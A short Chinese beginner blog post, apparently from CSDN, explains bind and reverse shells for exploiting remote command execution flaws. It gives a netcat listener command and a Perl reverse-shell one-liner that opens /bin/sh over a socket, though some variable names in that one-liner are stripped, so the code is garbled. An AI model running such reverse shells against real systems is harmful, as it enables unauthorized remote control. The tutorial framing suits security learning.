[基础入门]正向shell和反弹shell-CSDN博客
shell:执行用户命令的接口,通过这个接口实现对计算机的控制
反弹shell:一台主机控制另一台
- 正向shell:在攻击机上开启一个监听端口,让被攻击机主动连接攻击机,成功后,攻击机就能控制被攻击机——被攻击机被动攻击是正向的,主动被攻击是反弹shell
- 反弹shell:被攻击的机子是内网或者设置了防火墙,攻击机无法连接,但是被攻击机可以连接攻击机,从而被攻击
反弹shell可以用在远程命令执行RCE漏洞上
被攻击机主动连出来:棱角社区
IP选择攻击机的IP,监听端口5566(linux服务器:nc -lvnp 5566),生成的反弹shell语句,让被攻击机执行:远程命令执行或任意命令执行(上文有具体介绍)
如果没弹过来:
- 可以多复制多执行
- 可能无法解析,经过base64编码之后
- 或者bp抓包,放到repeater,改成post,echo;[perl语句]:大概率可以实现
perl -e 'use Socket;="127.0.0.1";=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(,inet_aton()))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
然后就会连接到被攻击机,得到他的权限
搜索该漏洞的影响版本,按照wp复现,但是不要真打,容易进去